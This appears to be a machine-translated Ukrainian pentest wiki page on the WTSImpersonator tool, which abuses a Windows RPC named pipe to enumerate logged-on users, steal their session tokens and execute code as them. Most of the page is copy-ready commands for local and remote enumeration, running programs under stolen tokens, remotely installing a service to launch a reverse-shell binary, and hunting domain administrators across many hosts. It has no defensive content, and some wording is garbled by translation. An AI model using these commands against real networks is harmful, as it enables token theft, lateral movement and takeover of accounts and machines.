The WTS Impersonator інструмент використовує "\pipe\LSM_API_service" RPC іменовану канал для недолічливого переліку ввійшовших користувачів та захоплення їх токенів, обхід традиційних технік імітації токенів. Цей підхід сприяє безшовному бічному руху в мережах. Інновація за цією технікою належить Omri Baso, чию роботу можна знайти на GitHub.

Основна функціональність

Інструмент працює за допомогою послідовності викликів API:

WTSEnumerateSessionsA → WTSQuerySessionInformationA → WTSQueryUserToken → CreateProcessAsUserW

Ключові модулі та використання

• Перелік користувачів: Локальний та віддалений перелік користувачів можливий за допомогою цього інструменту, використовуючи команди для обох сценаріїв:

• Локально:

.\WTSImpersonator.exe -m enum

• Віддалено, вказавши IP-адресу або ім'я хоста:

.\WTSImpersonator.exe -m enum -s 192.168.40.131

• Виконання команд: Модулі exec та exec-remote потребують контексту Служби, щоб працювати. Локальне виконання просто потребує виконуваного файлу WTSImpersonator та команди:

• Приклад для локального виконання команди:

.\WTSImpersonator.exe -m exec -s 3 -c C:\Windows\System32\cmd.exe

• PsExec64.exe може бути використаний для отримання контексту служби:

.\PsExec64.exe -accepteula -s cmd.exe

• Віддалене виконання команд: Передбачає створення та встановлення служби віддалено, схоже на PsExec.exe, що дозволяє виконання з відповідними дозволами.

• Приклад віддаленого виконання:

.\WTSImpersonator.exe -m exec-remote -s 192.168.40.129 -c .\SimpleReverseShellExample.exe -sp .\WTSService.exe -id 2

• Модуль пошуку користувачів: Спрямований на конкретних користувачів на кількох машинах, виконання коду від їх облікових даних. Це особливо корисно для спрямування на адміністраторів домену з правами локального адміністратора на кількох системах.

• Приклад використання:

.\WTSImpersonator.exe -m user-hunter -uh DOMAIN/USER -ipl .\IPsList.txt -c .\ExeToExecute.exe -sp .\WTServiceBinary.exe